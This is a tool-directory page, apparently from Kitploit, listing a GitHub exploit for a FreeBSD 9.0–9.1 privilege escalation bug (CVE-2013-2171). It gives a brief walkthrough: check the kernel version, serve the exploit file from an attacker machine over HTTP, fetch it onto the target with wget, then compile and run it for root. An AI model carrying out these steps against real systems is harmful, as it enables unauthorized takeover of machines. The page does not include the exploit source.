Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
FreeBSD-9.0-9.1-Privilege-Escalation — CVE-2013-2171 | Kitploit
Tools/GitHubGitHub/0xgabe/freebsd-9.0-9.1-privilege-escalation
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHub0xgabe/freebsd-9.0-9.1-privilege-escalation

FreeBSD-9.0-9.1-Privilege-Escalation

CVE-2013-2171

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
114 years agoNot yet reviewed

FreeBSD-9.0-9.1 - Privilege-Escalation

CVE-2013-2171

By [email protected]

How to Exploit!

1° Check the kernel version

root@kitploit:~
uname -a

FreeBSD freebsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012

2° Transfer this file to target

root@kitploit:~
Attacker machine -> python3 -m http.server 8080

Target machine -> wget IP:8080/26368.c

3° Use GCC to compile the code

gcc 26368.c -o exploit

4° Run the exploit

./exploit

Download Tool